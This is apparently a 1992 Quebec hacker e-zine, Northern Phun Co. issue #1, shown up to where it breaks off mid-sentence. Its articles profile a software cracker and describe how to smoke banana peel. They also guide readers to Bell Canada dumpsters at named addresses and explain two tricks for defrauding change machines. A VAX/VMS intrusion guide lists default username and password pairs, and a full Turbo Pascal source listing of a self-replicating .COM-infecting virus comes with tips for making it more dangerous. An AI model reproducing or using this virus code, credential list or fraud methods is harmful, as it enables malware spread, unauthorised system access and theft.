Autres handles: Intman
Ann�es d'exp�rience: A achet� son premier VIC le 25 juin 1982
Machines successives: Vic 20, 6 (oui! 6!) Commodore 64, Amiga
500, Amiga 2000
Associations pass�es: Crystal, Angel, Ctrl-X
Complice et co-sysop: LOUKAY

Le bab de Yakoul est ferm� depuis six mois environ. Il �tait �
ce moment ind�pendant (c'�tait m�me le nom de son bab) apr�s
avoir �t� successivement membre des trois groupe nomm�s plus
haut.
Yakoul est un ma�tre du crack. Le nombre de programmes qui se
sont laiss�s d�florer par ce mec est incalculable. Ses meilleurs
coups: AIRBORNE RANGER (son crack loadait plus vite que
l'original!), 21 SEC. BACK-UP, et un de ses modules, FAST-FILE
COPY (un crack complexe qu'il a �t� le premier � r�ussir). Son
utils pr�f�r� pour cracker �tait � l'�poque FASTLOAD de Epyx.
J'ai d�j� vu Yakoul cracker un programme d'Accolade en CINQ
minutes, montre en main!

YAKOUL regrette qu'aujourd'hui, la TOTALIT� des r�seaux de
crackers ne prennent pas la peine de tester les programmes au
complet avant de les runner sur un board. A son avis, cela d�note
plus que de la paresse ou de la b�tise: c'est un bon truc pour
s'en mettre plein les poches, � coups de ratios et de dollars...
Plut�t que de faire un package avec tra�ner, crack et doc, on
distribue le tout en module: le trainer d'un bord, les docs de
l'autre, 3-4-5 updates pour le crack, bref, une job salop�e...
Yakoul et Loukay, son complice, travaillaient fort diff�remment,
allant m�me jusqu'� marquer leurs cracks (le X-1 blanc sur fond
bleu dans le coin) pour qu'on puisse identifier la provenance du
crack si, d'aventure, celui-ci �tait d�fectueux...

Les distributeurs s'�changeaient les warez par la poste, �
l'�poque, parce que le standard �tait encore 1200 bauds (pour les
plus fortun�s!) et m�me 300 bauds! On va probablement rire de la
m�me fa�on des 9600 et des 14.4 dans quelques ann�es!

Yakoul n'h�site pas, comme plusieurs d'entre nous, � soulever le
couvercle de la machine pour aller lui tripatouiller les tripes
� coup de tournevis. Son exp�rience avec les Commodore 64 l'a
bien servi: il s'en est procur� successivement 6, dont plusieurs
qui avaient rendu leur dernier souffle, pour les reconstruire et
les refiler � un ami...

Question virus ou intrusion sur les syst�mes, nous ne donnerons
pas le nom des victimes, parce que certains boards de crosseurs,
� Qu�bec et ailleurs, portent encore les marques de la col�re de
Yakoul (mais si vous saviez!!! Hahaha!).

Yakoul se d�sint�resse un peu de la sc�ne depuis quelques temps
pour diverses raisons. Le d�part de son complice de toujours,
Loukay, a laiss� un vide, dit-il. Et son r�cent bust par le Bell
(fucking cartes d'appel! M�me les meilleurs peuvent faire des
erreurs!) lui a port� un coup dur.  Mais je ne serais pas surpris
outre mesure de le voir ressurgir d'ici quelques temps (c'est du
moins ce que je lui souhaite, bordel!). Les portes de Northern
Phun Co. lui sont grandes ouvertes!

Je laisse � notre invit� le mot de la fin:

" Il n'y a rien qui me fait plus chier que ceux qui utilisent
frauduleusement le handle de quelqu'un d'autre pour arriver �
leur fin. Ce n'est pas mieux de tenter de faire mousser sa
r�putation en pr�tendant �tre en mesure de faire des choses alors
que vous n'y connaissez rien. "

Une bonne d�finition d'un lamer, s'il en est une!


     �����ͻ
    ڶ N   ǿ    �Ŀ    ���     �����Ŀ  ����Ŀ �������Ŀ    �Ŀ
 ��Ĵ�  P  ����Ŀ� �     ����Ŀ � ��  �����Ŀ ��ſ     �����Ĵ1�
    ��   C ��   ����     �    ����     �  �   ��     ��    ���
     �����ͼ     ���������               ����




NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC
�                                                                             �
N                         R�alis� par: Coaxial Karma                          N
P -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- P
C                           Cheap drug: banadine                              C
�                                                                             �
NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC


 Avertissement: Je ne suis aucunement responsable des effets caus�s par
 la drogue qui suit.


��> Banadine (Produit de la banane)

 Les bananes contiennent une petite quantit� de substances psychad�liques.
 L'avantage de cette drogue est qu'elle est indirectement l�gal, puisqu'
 elle vient de la banane. D�butons:

1-  Prendre environ 1 kilogramme de pelure de banane

2-  Avec un couteau, peler l'int�rieur de la banane.

3-  Mettre les restants de l'int�rieur de la pelure dans un chaudron et, ajoutez-y
   de l'eau. Faites bouillir de trois (3) � quatre (4) heures. Le m�lange de-
   vrait alors �tre pateux.

4-  Etendre la p�te sur un plateau � pizza, et cuire environ vingt (20) �
   trente (30) minutes au four. Le produit qui en r�sultera devrait alors �tre
   une poudre noire.

5-  Finalement, f�mez-la. [et �touffez-vous!] 3 joints de cette substances
   donnent l'effet de 1 joint de h ou de pot.


     �����ͻ
    ڶ N   ǿ    �Ŀ    ���     �����Ŀ  ����Ŀ �������Ŀ    �Ŀ
 ��Ĵ�  P  ����Ŀ� �     ����Ŀ � ��  �����Ŀ ��ſ     �����Ĵ1�
    ��   C ��   ����     �    ����     �  �   ��     ��    ���
     �����ͼ     ���������               ����



                         --=GARBAGE, ANYONE?=--

                          Trashing, Bell style

                                   by
                               BLITZKREIG

Vous avez votre cagoule, votre lampe de poche, votre pince-
monseigneur, quatre ou cinq sacs verts pli�s dans la poche
arri�re, check! Le r�servoir de la voiture est plein, les copains
sont de bonne humeur: c'est le temps d'aller trasher! Oui, mais
o� aller? Vous avez consult� l'annuaire du t�l�phone, et pas une
seule petite adresse de Bell � se mettre sous la dent! NPC est
heureux de vous offrir son 1ER GUIDE DES MEILLEURES POUBELLES DE
QU�BEC...

Cat�gorie 4 sacs: La centrale sise au 1290 du boulevard St-
Cyrille. Une des derni�res visites des inspecteurs de NPC y a
r�v�l�: des docs, du e-mail et des antiquit�s fort pris�es pour
notre mur aux troph�es. Des vieux voltm�tres, des casques
d'op�rateur d'une autre �poque, des amp�rem�tres � p�dale, bref,
quelqu'un chez Bell a d�cid� de vider tout le vieux stock...

Cat�gorie 3 sacs: La centrale de la route de l'�glise, � Ste-Foy
(derri�re la biblioth�que municipale). Des documents, ma foi
int�ressants, mais un stationnement fort �clair� et loin de la
route, m�me s'il n'y a pas de cam�ras.

Cat�gorie 3 sacs: La centrale de la 1�re Avenue, � Charlesbourg
(entre la 71�me et la 70�me). Les employ�s de cette centrale sont
probablement des gros bras: nous y avons trouv� un banc
d'exercice lors de notre dernier passage!

Cat�gorie 2 sacs: Le 1150 Chemin St-Louis... Peut-�tre serez vous
plus chanceux que nous...

Cat�gorie 1 sac: De m�moire d'homme, nul n'a jamais vu un bac �
ordures au 504 Lavigueur. Non seulement l'endroit est
litt�ralement TRUFF� de cam�ras, mais il n'y a strictement pas
de poubelles! Ce qui nous fait dire que les employ�s de la place
doivent �tre malheureux si on les oblige � bouffer leurs ordures!

Cat�gorie 1 sac: Le 930 d'Aiguillon (Carr� d'Youville) est du
m�me calibre. Cam�ras et absence d'ordures. Les gens sont si
m�fiants...

Tome 2 des meilleures poubelles de la vieille capitale dans le
prochain num�ro...


     �����ͻ
    ڶ N   ǿ    �Ŀ    ���     �����Ŀ  ����Ŀ �������Ŀ    �Ŀ
 ��Ĵ�  P  ����Ŀ� �     ����Ŀ � ��  �����Ŀ ��ſ     �����Ĵ1�
    ��   C ��   ����     �    ����     �  �   ��     ��    ���
     �����ͼ     ���������               ����


NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC
�                                                                             �
N                         R�alis� par: Coaxial Karma                          N
P -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- P
C                   Fourvoyer l'oeil d'une machine � monnaie                  C
�                                                                             �
NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC

  N'avez-vous jamais vu une de ces grosses machines � monnaie dans les a�ro-
  ports et centre commerciaux, qui, lorsque vous d�posez 2 ou 5 dollars, vous
  redonne de la monnaie en �change ? Le fichier pr�sent vous aidera � les
  fourvoyer.

  En voici les �tapes:

  1- Trouver une machine.

  2- Apr�s avoir trouv�r la machine en question, prenez un billet de 2 ou 5
  dollars. Donnez-lui la forme d'une boule. Ensuite, redonnez-lui sa forme
  plate. La surface du billet devrait alors �tre ondul�e.

  3- Maintenant, le processus va se compliquer. Vous devez faire une d�chirure
  sur le c�t� gauche du billet a environ 1/2 pouce en-dessous du chiffre 5.

  4- Maintenant, ins�rez le billet dans la machine. Lorsque vous ins�rez le
     billet dans la machine, elle croit que tout est fonctionnel, et, au
     m�me moment, vous renvoie la monnaie. Mais, lorsqu'elle arrive � la
     partie d�chir�e du billet, la machine constate la d�chirure, et vous
     redonne le billet.

                 ��������������������������������Ŀ
                 � BANK OF CANADA                 �
                 � (5)         /������-\      (5) �
                 �             �       �          �
                 �             �       �          �
                 � (5)  /\     \�������/      (5) �
                 �      ��                        �
                 �����-/  \������������������������

                         \-------Faire une d�chirure ici.
                                 Environ 1/2 pouce en-dessous
                                 du chiffre 5.


P.S. Si ce fichier vous rapporte au dessus de 250$ par semaine, envoyer nous
    un l�ger pourcentage de 50%



     �����ͻ
    ڶ N   ǿ    �Ŀ    ���     �����Ŀ  ����Ŀ �������Ŀ    �Ŀ
 ��Ĵ�  P  ����Ŀ� �     ����Ŀ � ��  �����Ŀ ��ſ     �����Ĵ1�
    ��   C ��   ����     �    ����     �  �   ��     ��    ���
     �����ͼ     ���������               ����


{Northern Phun Co. Inc.  }
{NewsLetter #1 Phile #?  }
{Information gathered by }
{The Subhuman Punisher   }


                             -=Hacking VAX/VMS=-
                         -=Part One: Getting Into=-

             (* THIS FILE IS FOR INFORMATIONAL PURPOSES ONLY *)


iNTRO :  If you are a beginner at hacking or you are totally lacking
        ability, VAX/VMS is not the type of system to start on. Try
        UNIX, there are numerous text philes on it and they are
        rather easy to get into.

        Okay, you just logged into a VAX/VMS, which I will now use
        the VAX systems or the VMS system interchangeable for
        simplicity sake, as you've heard that you can get easily an
        unused account which the lazy system operator haven't
        deleted. VAX are usually linked with a front-end system
        like UNIX or DecServer.

        After successful connection is established, you will see
        something like this:

        VAX/VMS V5.3-1 Universite Laval (CRSNG)

        Here starts the phun part. After entering a username it
        will prompt you for a password, no matter if the username
        is OK or not. The password will not be echoed as you type.
        You will normally see a system message upon successfully
        logging in. The dollar sign ($) is the default prompt. And
        you will also be prompted with how many e-mails you have,
        etc.

        VAX/VMS have the following default accounts which you can
        use to log in if the system manager didn't take the time to
        configure his system safely (for him <g>):

                         ������������������������ͻ
                         � Username    � Password �
                         ������������������������Ķ
                         � SYSTEM      � MANAGER  �
                         � SYSTEM      � OPERATOR �
                         � FIELD       � SERVICE  �
                         � FIELD       � TEST     �
                         � DEFAULT     � DEFAULT  �
                         � DEFAUT      � USER     �
                         � SYSTEST     � UETP     �
                         � SYSTEST     � SYSTEST  �
                         � DECNET      � DECNET   �
                         � DECNET      � NONPRIV  �
                         � VAX         � VAX      �
                         � VMS         � VMS      �
                         � DCL         � DCL      �
                         � DEC         � DEC      �
                         � DEMO        � DEMO     �
                         � TEST        � TEST     �
                         � NETNONPRIV  � NONPRIV  �
                         � NETPRIV     � PRIV     �
                         � ORACLE      � ORACLE   �
                         � ALLIN1      � ALLIN1   �
                         � INGRES      � INGRES   �
                         � GUEST       � GUEST    �
                         � GAMES       � GAMES    �
                         � BACKUP      � BACKUP   �
                         � HOST        � HOST     �
                         � USER        � USER     �
                         � DIGITAL     � DIGITAL  �
                         � REMOTE      � REMOTE   �
                         � SAS         � SAS      �
                         � FAULT       � FAULT    �
                         � USERP       � USERP    �
                         � VISITOR     � VISITOR  �
                         � GEAC        � GEAC     �
                         � VLSI        � VLSI     �
                         � INFO        � INFO     �
                         � POSTMASTER  � MAIL     �
                         � NET         � NET      �
                         � LIBRARY     � LIBRARY  �
                         � OPERATOR    � OPERATOR �
                         � OPER        � OPER     �
                         ������������������������ͼ

Please note that many of the above are interchangeable, use your hacker mind to
"GETDAFUCKINTODERE". Now that you are in, there are many commands available to
you; I will review them in a future release of NPC [live long and prosper]!



------
VAX :  Virtual Access eXtension
VMS :  Virtual Memory System
------

CopyLeft (c) 1992 by The Subhuman Punisher & Northern Phun Co.



     �����ͻ
    ڶ N   ǿ    �Ŀ    ���     �����Ŀ  ����Ŀ �������Ŀ    �Ŀ
 ��Ĵ�  P  ����Ŀ� �     ����Ŀ � ��  �����Ŀ ��ſ     �����Ĵ1�
    ��   C ��   ����     �    ����     �  �   ��     ��    ���
     �����ͼ     ���������               ����




NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC
�                                                                             �
N                         R�alis� par: Coaxial Karma                          N
P -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- P
C                  Fourvoyer l'oeil d'une machine a monnaie II                C
�                                                                             �
NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC-NpC

   N'avez-vous jamais �t� � court de pi�ces de 25� lorsque vous jouez �
   l'arcade ? Le fichier pr�sent vous aidera a r�soudre ce probleme.


   Mat�riel:

       - Plaque d'aluminium

   Marche � suivre:

       - Trouver une machine � monnaie

       - Vous devez tailler la plaque d'aluminium � la dimension d'un billet.
         Ensuite, mettez celle-ci dans la machine, le c�t� brillant doit �tre
         orient� vers le haut. Le r�le de la machine est de verifier si le
         rayon lumineux envoy� est r�fl�chi, si c'est le cas, elle vous
         envoie la monnaie.



     �����ͻ
    ڶ N   ǿ    �Ŀ    ���     �����Ŀ  ����Ŀ �������Ŀ    �Ŀ
 ��Ĵ�  P  ����Ŀ� �     ����Ŀ � ��  �����Ŀ ��ſ     �����Ĵ1�
    ��   C ��   ����     �    ����     �  �   ��     ��    ���
     �����ͼ     ���������               ����



                     DR FRANKENSTEIN, WHERE ARE YOU?
                      Turbo Pascal et les bibittes

                        --=Virus pour d�butant=--
                              Virus NPC-011

                                   par
                               Blitzkreig
                                    &
                              Nancy Reagan

    Vous en bavez, n'est-ce pas, les mecs? Vous regardez les
virus files de L.O.S. ou Cybernetic Violence et vous demandez
quel g�nie peut bien concevoir toutes ces choses magnifiques...
Sachez que n'importe qui peut �crire un virus, n'importe qui
n'ayant pas peur de TRAVAILLER, s'entend. Si tu es le dernier de
ta classe en maths ou si la derni�re fois que tu as lu un manuel
les dinosaures �taient encore en voie d'extinction, passe ton
chemin, stranger. T'as probablement pas assez de couilles et de
volont� pour t'appliquer � ne pas faire de b�tises et tu vas te
ridiculiser avec ton virus plein de bugs (s'il fonctionne
jamais!). Pas de recette miracle pour les paresseux, m�me avec
Virus Creator Lab et ses semblables: que du travail, du travail
et du travail. Commence par le langage, le reste viendra tout
seul. Turbo Pascal, anyone?

    Avant de vous montrer comment effacer un FAT, loader un
trojan dans un GIF porno autoexec, ou la mani�re la plus efficace
de crasher ton board warez favori, on pourrait d'abord scruter
un virus fort simple, soulever le capot de la b�te et analyser
le m�canisme. Here it goes...

PR�CAUTIONS A PRENDRE: AUCUNES!

Nous allons, �tape par �tape, construire un virus en Turbo Pascal
( version 3.0 et plus), mais un virus sans danger, pour que vous
puissiez le tester sur votre machine. Nous le r�p�tons:
l'ex�cution de ce virus est absolument sans risque. La
propagation ne touchera pas les fichiers .EXE ou .BAT, uniquement
les .COM... Mieux encore, le virus, lorsqu'il s'attaquera � un
COM, en fera une copie non-infect�e, que vous pourrez r�cup�rer
plus tard. Et comme si ce n'�tait pas assez, une autre mesure de
s�curit� a �t� prise: le virus ne pourra lire que le drive A de
votre syst�me. Autrement dit, faites-vous une disquette avec 4
ou 5 .COM, mettez-la dans le drive A, et regardez comment le
virus r�agit.

CAT�GORIE DU VIRUS: LOGIQUE!

Comme si nous ne l'avions pas assez dit (vous comprenez vite,
mais il faut vous expliquer longtemps!), ce programme ne contient
aucune t�che de manipulation, il se contentera de manifester sa
pr�sence par le message "NPC made in Qu�bec".

Le programme qui suit vous permettra de construire un virus
"logique", qui simulera le comportement d'un virus sans
r��criture, et en lan�ant l'ex�cution, lorsque cela sera possible
(nous verrons les conditions plus tard), du programme original
depuis la copie du virus. Le programme va tenter d'infecter TOUS
les .COM en A, et affichera "La job est faite, chef!" lorsque
tous les .COM seront infect�s.
Pourquoi juste les .COM? Parce que ce type de programme a une
structure identique en m�moire et sur le disque, et parce que la
version 3.0 de Turbo Pascal permet de g�n�rer des fichiers .COM,
et c'est justement ainsi que vous devriez appeller votre virus
une fois assembl�: VIRUS.COM.

PRINCIPES G�N�RAUX DU VIRUS NPC-011

-    Sauvegarde du contenu de la constante "nomprog" dans la
    variable "b".

-    Recherche sur le disque A du premier fichier .COM ne
    contenant pas la marque "NPC made in Qu�bec".

-    Le programme que va infecter le virus sera sauv� et renomm�
    en   rempla�ant le premier caract�re de son nom par le
    symbole "$".
-    Le nom du programme renomm� sera �crit en m�moire vive �
    l'emplacement absolu de la constante "nomprog",
    pr�alablement  sauvegard�e.

-    Cr�ation d'un nouveau fichier du nom du programme �
    infecter.

-    Recopiage du programme en m�moire vive dans le fichier cr��.

-    Ex�cution du programme dont le nom figure dans la variable
    "b"  (on va aussi voir �� tout-�-l'heure) A CONDITION que
    le   fichier existe sur le disque ET que ce programme ait
    �t�  g�n�r� par Turbo Pascal 3.0 (ou la version que vous
    utilisez).

Vous nous suivez jusqu'ici? C'est bien! Sinon, les choses vont
s'�claircir au fur et � mesure que nous avancerons. Le programme
NPC-011 repose sur deux principes g�n�raux:

1) La d�claration d'un tableau d'octets "deb" situ� � l'adresse
absolue: CSEG:$100. Cette adresse correspond au d�but du code de
programme en m�moire (CSEG contient l'adresse du segment de code
et tous les programmes .COM d�butent � l'adresse offset $100).
Ainsi le tableau "deb" est identique au code du virus en m�moire,
il suffit de recopier ce tableau sur un programme pour recopier
le code du virus.

2) On �crit directement en m�moire  � l'adresse
"CSEG:OFS(nomprog) + 1", le nom renomm� du programme en cours de
manipulation. A quoi ca sert, me demandez-vous: tenez-vous bien!
Lorsque le programme du virus sera lanc�, et apr�s qu'il ait
accompli sa "manipulation", il encha�nera sur l'ex�cution du
programme dont le nom figure dans la variable "b", simulant ainsi
un fonctionnement impeccable!

ENCORE QUELQUES MOTS

Le listing qui suit pourrait sembler, aux yeux des n�ophytes, un
contresens: on programme les commandes d'infection du virus avant
les commandes qui lui disent de chercher une victime. C'est tout
� fait normal: il faut "mettre le virus au monde", et lui
indiquer au cours de sa cr�ation ce qu'est exactement sa mission
dans la vie. Une fois qu'il sait ce qu'il doit accomplir, l�, tu
lui dit: va te trouver une victime et amuse-toi! Ca a l'air
simple, comme ca, mais c'est le bout qui demande parfois le plus
de subtilit�, car la programmation exige bien souvent de proc�der
A L'ENVERS de ce qui, autrement, nous semblerait logique. Pour
les durs de comprenure, illustrons ce qui pr�c�de: Supposons que
tu engages un tueur � gages, justement, pour �liminer ton
professeur de chimie. Tu vas probablement lui dire "Entre dans
l'�cole, entre dans la classe, et descend le professeur de
chimie, ensuite ressort". Si, par contre, tu "programmais" un
tueur � gages, il faudrait plut�t que tu lui dises: "Ta mission
est de tuer le professeur de chimie, tu dois pour ce faire
utiliser ce pistolet, voici comment il fonctionne. Maintenant,
entre dans l'�cole, entre dans la classe, et remplis la mission
pour laquelle je t'ai programm�". C'est du moins la mani�re dont
nous proc�dons, Nancy Reagan et moi-m�me. Enfin... C'est un peu
succint comme explication mais j'esp�re que vous avez tous
compris (ou alors retournez lire vos Tintins...). Naturellement,
la programmation d'un virus est g�n�ralement encore plus
sophistiqu�e que cel�, ce qui me ram�ne � mon premier argument:
�tudier, �tudier, �tudier...

C'est maintenant la passe la plus plate (pour nous) de cet
article: le listing du programme. Mais y faut c'qui faut!!



LISTING DU PROGRAMME


PROGRAM virus;

TYPE      chaine = STRING[15];

CONST
         n = 13002; {longueur du virus compil�}

    nomprog : STRING[15] = "

";

    marque : STRING[31] = "NPC made in Qu�bec";

VAR       deb : ARRAY [0..15000] OF BYTE ABSOLUTE

CSEG:$100;

       b : chaine;

     fic : FILE;

       i : INTEGER;

signature : STRING[24];

PROCEDURE fin;

{En gros, toute cette proc�dure ex�cute le programme $..}

VAR a: STRING[24];

BEGIN{fin}

    CLRSCR;

    {$1-} {Supprime le contr�le des entr�es/sorties}

    ASSIGN(fic,b);

    RESET(fic,1);

    IF IORESULT=0 {Si il n'y a pas d'erreurs d'entr�es/sorties}

    THEN

    BEGIN

       BLOCKREAD(fic,deb,44);

       a := "";

       FOR i:=21 TO 44 DO

         a:= a + CHR(deb[i]);

{Ce qui veut dire que si le programme $.. est un programme Turbo
Pascal 3.0, l'ex�cuter}

      IF a = signature THEN EXECUTE(fic)

    END;

    HALT{interruption du programme}

END; {fin}

PROCEDURE infecte(a:chaine);

(Cette proc�dure cr�e le nouveau programme de virus}

VAR

    ficmanip : FILE;

           i : INTEGER;

BEGIN{Ce programme lance l'infection, le bout que vous attendiez
tous!}

{Maintenant, le nom du programme en cours d'infection est recopi�
dans le programme de virus avec le caract�re "$"}

FOR i := LENGTH(a)+1 TO 15 DO

  a := a + " ";

FOR i :=1 TO 15 DO

    MEM[CSEG:OFS(nomprog)+i] := ORD(COPY(a,i,1));

    MEM[CSEG:OFS(nomprog)+4] := ORD("$");

{Le tableau deb est copi� sous le nom du fichier manipul�}

    ASSIGN(ficmanip,a);

    REWRITE(ficmanip);

    RESET(ficmanip,1);  {Ouverture du programme � infecter. Y�!}

    BLOCKWRITE(ficmanip,deb,n);  {Ecriture dans le fichier}

    CLOSE(ficmanip); {Fermeture du fichier manipul�}

    fin

{5 petites lignes de commandes, et le tour est jou�! Mais ne vous
r�jouissez pas trop vite, on a pas termin�!}

END; {Infecte!}

PROCEDURE recherche;

{Cette proc�dure recherche les fichiers COM sur l'unit� A}

TYPE

  dtarec = RECORD

    tab : ARRAY[1..21] OF BYTE;

    attribut : BYTE;

    heure,date,taillehaute,taillebasse : INTEGER;

    nom : ARRAY[1..13] OF CHAR

 END;

registres = RECORD

 CASE BYTE OF

 1 : (AX,BX,CX,DX,BP,SI,DI,DS,ES,Flags : INTEGER);

 2 : (AL,AH,BL,BH,CL,CH,DL,DH          : BYTE)

END;

VAR

         dta : dtarec;

      chemin : STRING[20];

  longchemin : BYTE ABSOLUTE chemin;

       regis : registres;

           i : BYTE;

PROCEDURE renomme;

{Cette proc�dure v�rifie que le fichier s�lectionn� (la victime)
n'est pas d�j� infect� et renomme le fichier � manipuler en
remplacant le premier caract�re du nom du programme par un "$"}

VAR

nom,nouvnom : chaine;

        fic : FILE;

        i,k : INTEGER;

          a : STRING[32];

          b : BOOLEAN;

BEGIN{renomme}

    b := TRUE;

    chemin := dta.nom;

    i := POS(*0,chemin);

    IF i >0 THEN DELETE(chemin,i,255);

    nom := "A:\" + chemin;

    IF (COPY(nom,4,1) <> "$")

    THEN

    BEGIN

      ASSIGN(fic,nom);

      RESET(fic,1);

      k := OFS(marque);

{Au cas ou le programme aurait une taille plus grande ou �gale
� celle du virus}

      IF FILESIZE(fic) >= n

    THEN

    BEGIN

{Lecture de la zone de marque du virus, pour voir si le programme
est infect�}

    BLOCKREAD(fic,deb,k+31);

    a := "";

    FOR i := 1 TO 31 DO

    a := a + CHR(MEM[CSEG:k+i]);

    IF a = marque THEN b:= FALSE

END;

IF b THEN {Si le fichier n'est pas infect�}

    BEGIN

    {Renommer le fichier � manipuler}

    nouvnom := "A:\$"+COPY(nom,5,length(nom)-4);

    RENAME(fic,nouvnom);

    infecte(nom) {Appel de la routine d'infection. Y�!}

    END

 END

END; {renomme}

BEGIN {recherche}

{Initialisation de l'adresse de la DTA}

regis.AH := $1A;

regis.DS := SEG(dta);

regis.DX := OFS(dta);

MSDOS(regis);

{Recherche du premier fichier .COM du disque A}

chemin := "A:\*.COM";

chemin[SUCC(longchemin)]:=*0;

regis.AH := $4E;

regis.DS := SEG(chemin);

regis.DX := OFS[chemin(1)];

regis.CX := $FF;

MSDOS(regis);

IF regis.AX <> $12 {S'il existe un fichier .COM sur A:}

THEN

REPEAT

  renomme;

{On recherche le fichier .COM suivant pour l'infecter...}

regis.AH := $4F;

regis.DS := SEG(dta);

regis.DX := OFS(dta);

MSDOS(regis);

UNTIL regis.AX = $12 {jusqu'� ce qu'ils portent tous la signature
du virus}

END; {recherche}

BEGIN {virus}

  CLRSCR;

  GOTOXY(25,12);

  WRITELN(marque);

  {C'est le copywrite de Turbo Pascal 3.0, rendons � C�sar ce
qui appartient � C�sar...}

  signature := *49+*57+*56+*53+*32+*66+*79+*82+*76+*65+*78+*68+
*32+*73+*110+*99+*2+*4+*0+*177+*87+*0+*60+*51;

{Le nom du programme est lu en m�moire pour pouvoir �tre ex�cut�
� la fin de la proc�dure}

b:='';

FOR i := OFS(nomprog)+1 TO OFS(nomprog) +15 DO

b:=b+(CHR(MEM[CSEG:i]));

recherche;

CLRSCR;

GOTOXY(20,12);

WRITELN("La job est faite chef!");

GOTOXY(20,13);

WRITELN("Ton repertoire A est lessive mon mec!");

REPEAT UNTIL KEYPRESSED; {Le texte va apparaitre aussi longtemps
que tu n'auras pas press� une cl�}

fin

END. {Et voil� l'travail!}


Ne continuez plus � �crire, l�, c'est termin�! Bon, laissez-nous
souffler un peu. C'est vraiment assommant de taper tout ca...

PORTRAIT DES ACTIVIT�S

Ce que vous devriez normalement voir, si vous faites un dir de
A � chaque �tape, c'est � peu pr�s ceci (exemple):

1) AVANT L'EX�CUTION DE VIRUS.COM

A:

APPEND    COM  1742 K
README    COM   543 K
POUBELLE  BAT  4555 K
FUCKME    HLP   800 K

2) APR S L'EX�CUTION DE VIRUS.COM SUR LE PREMIER FICHIER TROUV�

A:

$PPEND    COM  1742 K
README    COM   543 K
APPEND    COM 13002 K
POUBELLE  BAT  4555 K
FUCKME    HLP   800 K

(Remarquez que le append.com est pass� de 1742 octets � 13002
octets. Pourquoi, selon vous? Parce que le virus s'y cache et
augmente sa masse, voyons!. Le fichier original append.com est
toujours l�, seulement, il s'appelle $append.com maintenant. Mais
il est intact, rassurez-vous!)

3) APR S L'EX�CUTION DU PREMIER PROGRAMME CONTAMIN�

A:

$PPEND    COM  1742 K
$EADME    COM   543 K
APPEND    COM 13002 K
README    COM 13002 K
POUBELLE  BAT  4555 K
FUCKME    HLP   800 K

(Le virus a ex�cut� append.com, et part maintenant � la chasse
apr�s un autre .COM. Si un programme .COM �tait �crit en Turbo
Pascal, nous l'avons dit, le virus l'ex�cuterait, et si le
programme avait une fonction visible (ex: un crack TSR), vous le
verriez agir � l'�cran -le crack s'installerait- )


NOTES DIVERSES

Nous esp�rons que vous avez compris quelque chose � ce petit
cours de "virusologie" en acc�l�r�. Vous �tes loin d'�tre sortis
du bois, cependant! Mais, pour les plus observateurs d'entre
vous, vous avez surement not� quelques endroits, ici et l� dans
cette routine, qui, une fois l�g�rement modifi�es, pourraient
rendre ce virus autrement plus dangereux... Il y a effectivement
des am�liorations, ma foi fort simples, qui pourraient �tre
apport�es, et pour n'en citer que quelques unes:

-changer le drive de travail du programme de A � C (vous �tes
capables de trouver ca seul!).

-Sauvegarder les dates et heures de cr�ation des programmes
originaux, puis les restituer dans le programme modifi� par le
virus (mais o� placer la routine? Guess!).

D'autres suggestions? Laissez-nous un message!



NPC-011: VIRUS FOR THE MASSES!


     �����ͻ
    ڶ N   ǿ    �Ŀ    ���     �����Ŀ  ����Ŀ �������Ŀ    �Ŀ
 ��Ĵ�  P  ����Ŀ� �     ����Ŀ � ��  �����Ŀ ��ſ     �����Ĵ1�
    ��   C ��   ����     �    ����     �  �   ��     ��    ���
     �����ͼ     ���������               ����



                            L'�tat des choses
                                   ou

                    LA SCENE DE QU�BEC: QUELLE SCENE?

                                   par
                                THX 1138
                        and the rest of the posse

La sc�ne? Quelle sc�ne? Ah! Vous voulez parler de ces babillards
"pirates" o� on discute de hockey et de r�f�rendum? Atreid
Bevatron vous a dit tout � l'heure tout le mal qu'il pensait de
ce genre de conversation dans le contexte, et je suis
naturellement de son avis. Que vous t�tiez apr�s des 0-30 warez
(qui sont en r�alit� des 90-150!), passe encore: nous savons
qu'un jour ou l'autre, l'appel du pirate sera le plus fort et que
vous allez devenir S�RIEUX dans vos hobbies, les mecs. Remarquez,
je comprends que vous tentez de gonfler vos ratios avec des
conversations anodines, mais, faut-il le souligner, un tel
comportement de la part de gens qui enfreignent SCIEMMENT la loi
nous laisse perplexe. Vous savez que vous enfreignez la loi avec
vos warez pirat�s, n'est-ce pas? Alors, tant qu'� risquer de vous
faire pincer, arrangez-vous pour que �a en vaille la peine!
Imaginez le juge qui vous condamne � 2500 dollars d'amende pour
avoir upload� la copie beta de DOS 6.0 et pour avoir fait des
postings sur les Nordiques dans un bab illicite! Si �a se sait,
vous allez faire rire de vous! Remarquez, vous ne portez pas tout
le bl�me: c'est le syst�me actuel de ratios qui vous force la
main et qui vous pousse � �crire tous ces messages ridicules. Et
je vais vous �pargner toutes nos r�flexions � propos de la
qualit� du fran�ais...

Si on veut tracer un portrait fid�le du milieu, et au risque de
choquer certains sysops (m�me si ceux-ci devraient, comme nous
tous d'ailleurs, pouvoir regarder la v�rit� en face), c'est que
la partie pirate (c.a.d. warez) de QU�BEC est domin�e pour le
moment par The Joker's Den et Eldar's Craftworld. Tous les autres
babs, � ma connaissance, se nourrissent des miettes qui tombent
sous la table... Et pour cause, ces deux babs pratiquent des
